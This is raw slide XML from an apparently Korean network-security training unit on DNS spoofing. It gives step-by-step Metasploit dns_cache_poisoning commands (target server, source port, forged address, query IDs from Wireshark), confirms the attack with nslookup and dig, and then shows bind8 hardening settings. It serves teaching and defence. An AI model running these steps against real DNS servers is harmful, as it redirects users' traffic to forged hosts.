              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; show options</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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET RHOST 10.10.1.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET SRCPORT 33333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버가 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의를 보낼 때 사용하는 포트 번호</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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>오염 대상 호스트 설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRP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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET NEWADDR 10.10.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위에서 설정한 호스트의 가짜 주소</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9) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>응답 설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET BASEID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BASEID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 획득한 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하면 되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수로 변환하여 입력해야 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; SET XIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주입할응답수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 이용한 패킷 캡처 시작 및 공격 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) &gt; run</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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 통해 공격 수행 과정 및 성공 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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 모듈에 의해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의가 공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 모듈에 의해 다수의 가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>응답들이 주입됨</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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 성공 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버가 공격 모듈에서 주입한 가짜 응답을 받아들임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</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12) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령어로 공격 성공 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.14</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># dig @10.10.1.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">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및 오염시킨 호스트명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1">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/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 11. DNS Spoofing -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 파일 열기 편집</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>named.conf</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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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query-source port 33333; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>삭제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>➡ 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버의 응답을 수신하는 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 고정하지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>         (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의별로 다른 포트 번호가 부여되는 것은 아니며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, bind8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 시작될 때 임의로 지정됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ use-id-pool true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    ➡ ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 순차적으로 증가시키는 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>풀에서 임의의 값을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
